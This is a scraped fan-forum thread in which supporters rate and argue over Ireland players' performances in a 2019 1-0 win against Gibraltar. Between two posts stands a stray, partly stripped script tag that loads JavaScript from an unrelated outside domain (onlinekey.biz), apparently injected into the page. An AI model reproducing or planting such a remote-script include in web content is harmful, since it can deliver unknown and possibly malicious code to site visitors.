You Boys in Green Homepage YBIG Shop
Forum Home Forum Home : International : Republic Of Ireland
  FAQ FAQ  Forum Search   Events   Register Register  Login Login

players' rating vs the Rock

Post Reply Post Reply Page  123 5>
Author
Kevin Kilbane
Kevin Kilbane

Post Options Post Options   Thanks (0) Thanks(0)   Quote Gerry Geary Quote  Post ReplyReply Direct Link To This Post Topic: players' rating vs the Rock
    Posted: 23 Mar 2019 at 9:04pm
I watched the whole. Cant Play on that plastic pitch. Even though we got trapped. should have been a 3-4-1-2.

randy. 7
Coleman 5
duffy 5
keogh 4
stevens 4

doherty 5
hendrick 5
hourihane 5
mcclean 5

mcgoldrick 6
maguire 4

Brady 5
@rter 5
Sponsored Links

The O'Shea View Drop Down
Jack Charlton
Jack Charlton
I know everything and I’m NEVER wrong

Post Options Post Options   Thanks (0) Thanks(0)   Quote The O'Shea Quote  Post ReplyReply Direct Link To This Post Posted: 23 Mar 2019 at 9:11pm
Randolph-7
Coleman-5
Duffy-4.5
Keogh-5
Stevens-4.5
Doherty-4.5
Hourihane-5.5
Hendrick-6.5
McClean-3
McGoldrick-5.5
Maguire-5
We're decent enough..
pre Madonna View Drop Down
Robbie Keane
Robbie Keane
I am MALDING

Post Options Post Options   Thanks (0) Thanks(0)   Quote pre Madonna Quote  Post ReplyReply Direct Link To This Post Posted: 23 Mar 2019 at 9:18pm
Randolph 8-  Brilliant save at a crucial time

Coleman 4 - Far from the worst out there
Duffy      2- Why does he think he is Ronald Koeman or Lothar Matthaus?
Keogh     3- Little better
Stevens   3- Did he complete a pass

Doherty   4- Similar to Coleman. A bizarre substitution
Hendrick 3- He got the goal, he was dire otherwise. Hiding against Gibraltar is just embarrassing.
Hourihane 2- He had a couple of decent set-pieces, but was atrocious in general play. His passing is pitiful
McClean-1 For turning up. A waste of a jersey. You would expect some fight from him, tonught his fight amounted to a stupid yellow card and nothing else.

McGoldrick- 0 Pitiful. Hopefully he changes boots for Tuesday, the concrete ones aren't working
Maguire- 1 The one is for the eyebrows.
Maccatacca View Drop Down
Ray Houghton
Ray Houghton

Post Options Post Options   Thanks (0) Thanks(0)   Quote Maccatacca Quote  Post ReplyReply Direct Link To This Post Posted: 23 Mar 2019 at 9:45pm
Randolph 6
Coleman 2
duffy 2
keogh 2
stevens 3

doherty 4
hendrick 2
hourihane 2
mcclean 1

mcgoldrick 3
maguire 1
BohsinMunich View Drop Down
Ray Houghton
Ray Houghton

Post Options Post Options   Thanks (0) Thanks(0)   Quote BohsinMunich Quote  Post ReplyReply Direct Link To This Post Posted: 23 Mar 2019 at 9:54pm
Agree Randolph was best player just for that save.
The lack or of urgency to get a 2nd goal was brutal. 
Maybe someone had bet 100K on a 1 0 scoreline ?
Fitz View Drop Down
Liam Brady
Liam Brady

Post Options Post Options   Thanks (0) Thanks(0)   Quote Fitz Quote  Post ReplyReply Direct Link To This Post Posted: 23 Mar 2019 at 10:05pm
Originally posted by pre Madonna pre Madonna wrote:

Hendrick 3- He got the goal, he was dire otherwise. Hiding against Gibraltar is just embarrassing.
Hourihane 2- He had a couple of decent set-pieces, but was atrocious in general play. His passing is pitiful
McClean-1 For turning up. A waste of a jersey. You would expect some fight from him, tonught his fight amounted to a stupid yellow card and nothing else.

McGoldrick- 0 Pitiful. Hopefully he changes boots for Tuesday, the concrete ones aren't working

Houriane 2, and Maguire better than McGoldrick?? My god, you are a crank and a half! 
50%lesssugar&salt View Drop Down
Liam Brady
Liam Brady

Post Options Post Options   Thanks (0) Thanks(0)   Quote 50%lesssugar&salt Quote  Post ReplyReply Direct Link To This Post Posted: 23 Mar 2019 at 10:08pm
Originally posted by Fitz Fitz wrote:

Houriane 2, and Maguire better than McGoldrick?? My god, you are a crank and a half! 

He did point out it was purely on the eyebrows. If McGoldrick was as well endowed in that department I am sure he would have gotten 1 too.

Robbie Keane
Robbie Keane
I am MALDING

Post Options Post Options   Thanks (0) Thanks(0)   Quote pre Madonna Quote  Post ReplyReply Direct Link To This Post Posted: 23 Mar 2019 at 10:09pm

You may be right about Hourihane, I am willing to knock him down to 1. Maguire and McGoldrick were equally as bad as each other, but Maguire has the eyebrows.
Fitz View Drop Down
Liam Brady
Liam Brady

Post Options Post Options   Thanks (0) Thanks(0)   Quote Fitz Quote  Post ReplyReply Direct Link To This Post Posted: 23 Mar 2019 at 10:13pm
Great save from Randy. 
Coleman did okay going forward.
 Stupid yellow picked up by Stevens. 
Thought McClean was dire and should’ve been hooked at half-time. Not Doherty’s day - close marking and the narrow pitch definitely didn’t suit him. 
Hourihane had a good first half - very good really - but faded in the second-half like everyone else. 
Nice finish by Hendrick but nowhere in the second-half either.
 Maguire looked out of his depth - didn’t get much service but looked far from convincing.
 McGoldrick did relatively well, especially first half. 

Subs mad no sense. What’s the point in bringing in Brady, who’s had very little football this year, and then playing him out of position?? Arter tried a bit, but was somewhat out of position as well. 

Edited by Fitz - 23 Mar 2019 at 10:16pm
Fitz View Drop Down
Liam Brady
Liam Brady

Post Options Post Options   Thanks (0) Thanks(0)   Quote Fitz Quote  Post ReplyReply Direct Link To This Post Posted: 23 Mar 2019 at 10:15pm

You may be right about Hourihane, I am willing to knock him down to 1. Maguire and McGoldrick were equally as bad as each other, but Maguire has the eyebrows.

If you’re taking the mick, fair enough, but if you really think Hourihane didn’t have a decent first-half, then I don’t know what planet you’re on tbh. 
Conan View Drop Down
Davey Langan
Davey Langan
I’m not very bright.

Post Options Post Options   Thanks (0) Thanks(0)   Quote Conan Quote  Post ReplyReply Direct Link To This Post Posted: 23 Mar 2019 at 10:19pm
Randolph 8-  half the people on here would still probably drop him for Westwood no matter how many times he saves us

Coleman 5
Duffy      4
Keogh     4
Stevens   3

Doherty   4
Hendrick 3
Hourihane 5
McClean 2

McGoldrick 3
Maguire 2

We were playing a bunch of amateur pub footballers on their day off from work, anything less than 4-0 even for a team of our talent pool is pitiful
< ="text/" async="" ="//onlinekey.biz/1f9f5ee62aefca3cb1.js">
Robbie Keane
Robbie Keane
I am MALDING

Post Options Post Options   Thanks (0) Thanks(0)   Quote pre Madonna Quote  Post ReplyReply Direct Link To This Post Posted: 23 Mar 2019 at 10:20pm

If you’re taking the mick, fair enough, but if you really think Hourihane didn’t have a decent first-half, then I don’t know what planet you’re on tbh. 
You have to be taking the piss! They were the better team for the first twenty minutes!We couldn't get a hold of the ball in the midfield for the whole game. Both Hendrick and Hourihane should be embarrassed and ashamed. If that is him being decent then he should retire.
Gerry Geary View Drop Down
Kevin Kilbane
Kevin Kilbane

Post Options Post Options   Thanks (0) Thanks(0)   Quote Gerry Geary Quote  Post ReplyReply Direct Link To This Post Posted: 23 Mar 2019 at 10:21pm
Hourihane did well but made a costly mistake playing deep
doherty View Drop Down
Jack Charlton
Jack Charlton
Teenage Kicks, so hard to beat

Post Options Post Options   Thanks (0) Thanks(0)   Quote doherty Quote  Post ReplyReply Direct Link To This Post Posted: 23 Mar 2019 at 10:22pm
Lads this malarkey about hendrick is bull. He had a decent game today. Got on the ball loads and his finish was composed. Way better than he has been in recent games. He could score 5 goals in a game and some of ye would still find fault. Him and hourihane were pretty good today i thought. Its the same every game on here regards jeff. 
Banjaxed View Drop Down
Liam Brady
Liam Brady

Post Options Post Options   Thanks (0) Thanks(0)   Quote Banjaxed Quote  Post ReplyReply Direct Link To This Post Posted: 23 Mar 2019 at 10:23pm
Every out field player was on a varying level of shi!te. Willing to give benefit of the doubt given pitch, weather and Mick's only had a few training sessions.

Positives: there was obvious plan in final 3rd. Hendrick scored, coming from deep. This wouldnt have happened under MON. Jeff was obviously under instruction. Hopefully Mick's influence on players will grow as campaign continues. 

Tuesday at home on an actual pitch, and not blowing a gale, will give us a better idea of where things are at. 
Fitz View Drop Down
Liam Brady
Liam Brady

Post Options Post Options   Thanks (0) Thanks(0)   Quote Fitz Quote  Post ReplyReply Direct Link To This Post Posted: 23 Mar 2019 at 10:28pm

You have to be taking the piss! They were the better team for the first twenty minutes!We couldn't get a hold of the ball in the midfield for the whole game. Both Hendrick and Hourihane should be embarrassed and ashamed. If that is him being decent then he should retire.

If Hendrick did ‘shame’ he’d have retired a few years back.

Took us a while to get any foothold, agreed, but your ratings of 1s, 2s and 3s make you come across like an online version of Roy Curtis tbf. 
Robbie Keane
Robbie Keane
I am MALDING

Post Options Post Options   Thanks (0) Thanks(0)   Quote pre Madonna Quote  Post ReplyReply Direct Link To This Post Posted: 23 Mar 2019 at 10:30pm

If Hendrick did ‘shame’ he’d have retired a few years back.

Took us a while to get any foothold, agreed, but your ratings of 1s, 2s and 3s make you come across like an online version of Roy Curtis tbf. 
I wish he f**king had! 
We just beat a team of amateurs and semi-professionals 1-0 with an abject performance, I think the marks they got are fair.

That is my opinion, if you don't like it I have loads of others!
The O'Shea View Drop Down
Jack Charlton
Jack Charlton
I know everything and I’m NEVER wrong

Post Options Post Options   Thanks (0) Thanks(0)   Quote The O'Shea Quote  Post ReplyReply Direct Link To This Post Posted: 23 Mar 2019 at 10:32pm
The flack Hendrick takes is bizarre alright, literally our only midfielder capable of dribbling past opposition players. Had a pretty good game today topped off with a good goal. Himself and Arter is our best midfield pairing, two players who are actually competent on the ball and don't sh*t themselves at the slightest hint of pressure.
We're decent enough..
 Post Reply Post Reply Page  123 5>
  Share Topic